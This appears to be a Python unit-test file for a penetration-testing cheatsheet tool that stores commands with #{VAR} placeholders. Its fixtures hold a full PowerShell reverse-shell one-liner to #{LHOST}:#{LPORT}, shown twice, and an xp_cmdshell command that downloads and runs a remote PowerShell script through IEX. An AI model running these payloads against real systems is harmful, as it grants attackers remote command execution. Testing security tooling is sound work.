def test_append(cls):
cmdlist = CommandList()
l = [
Command(
"""$client = New-Object System.Net.Sockets.TCPClient("#{LHOST}",#{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""
),
Command(
"""mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth""")
]
cmdlist.append(l)
assert len(cmdlist) == 2
def create_cmdlist(cls):
cmdlist = CommandList()
cmdlist.append(SplitLine('Sqlmap'))
cmdlist.append(
Command('mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth'))
cmdlist.append(
Command(
"""xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://#{LHOST}:#{LPORT}/#{file}\");"""
""))
cmdlist.append(
Command(
"""$client = New-Object System.Net.Sockets.TCPClient("#{LHOST}",#{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""
))
return cmdlist
def test_parse(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.parse()
assert len(cmd.vars) == 3
assert str(
cmd.vars.list.keys()) == "odict_keys(['DOMAIN', 'USER', 'RHOST'])"
cmd.add_cmd("host -t #{type} #{RHOST}")
cmd.parse()
assert len(cmd.vars) == 4
assert str(cmd.vars.list.keys()
) == "odict_keys(['DOMAIN', 'USER', 'RHOST', 'type'])"
def test_to_shell(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.add_cmd("host -t #{type} #{RHOST}")
shell = cmd.to_shell()
assert shell == 'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth\nhost -t #{type} #{RHOST}'
shell_one_line = cmd.to_shell(one_line=True)
assert shell_one_line == 'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth && host -t #{type} #{RHOST}'
def test_merge_var(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.parse()
varlist = VariableList()
varlist.set({'name': 'RHOST', 'func': 'desc', 'value': 'remote host'})
varlist.set({'name': 'IP', 'func': 'desc', 'value': 'ip'})
cmd.merge_var(varlist)
assert len(cmd.vars) == 3
assert cmd.vars['RHOST'].desc == 'remote host'
assert 'IP' not in cmd.vars
def test_merge_note(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.add_note('desc: this is description')
cmd.add_note('refer: this is refer')
cmd.add_note('refer: this is refer 2')
cmd.add_note('link: this is link')
cmd.add_note('link: this is link 2')
cmd.add_note('this is note')
cmd.add_note('this is note 2')
notes = [
'desc: this is merge description', 'refer: this is merge refer',
'link: this is merge link', 'this is merge note'
]
cmd.merge_notes(notes)
assert len(cmd.notes) == 3
assert len(cmd.links) == 3
assert len(cmd.refer) == 3
assert cmd.desc == 'this is merge description'
assert cmd.notes[0] == 'this is merge note'
# 只有 note 会翻转
assert cmd.links[2] == 'this is merge link'
assert cmd.refer[2] == 'this is merge refer'
def test_base(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.cmd == 'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth'
def test_add_link(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.add_link('pentesting/recon/dns_lookup')
assert len(cmd.links) == 1
assert cmd.links[0] == 'pentesting/recon/dns_lookup'
def test_add_refer(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.add_refer('https://book.hacktricks.xyz/pentesting')
assert len(cmd.refer) == 1
assert cmd.refer[0] == 'https://book.hacktricks.xyz/pentesting'
def test_add_note(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
cmd.add_note('desc: this is description')
cmd.add_note('refer: this is refer')
cmd.add_note('refer: this is refer 2')
cmd.add_note('link: this is link')
cmd.add_note('link: this is link 2')
cmd.add_note('this is note')
cmd.add_note('this is note 2')
assert len(cmd.notes) == 2
assert len(cmd.refer) == 2
assert len(cmd.links) == 2
assert cmd.desc == 'this is description'
assert cmd.refer[0] == 'this is refer'
assert cmd.links[0] == 'this is link'
assert cmd.notes[0] == 'this is note'
def test_add_cmd(cls):
cmd = Command(
'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
assert len(cmd.cmd) == 1
cmd.add_cmd("select IS_SRVROLEMEMBER('sysadmin')")
assert len(cmd.cmd) == 2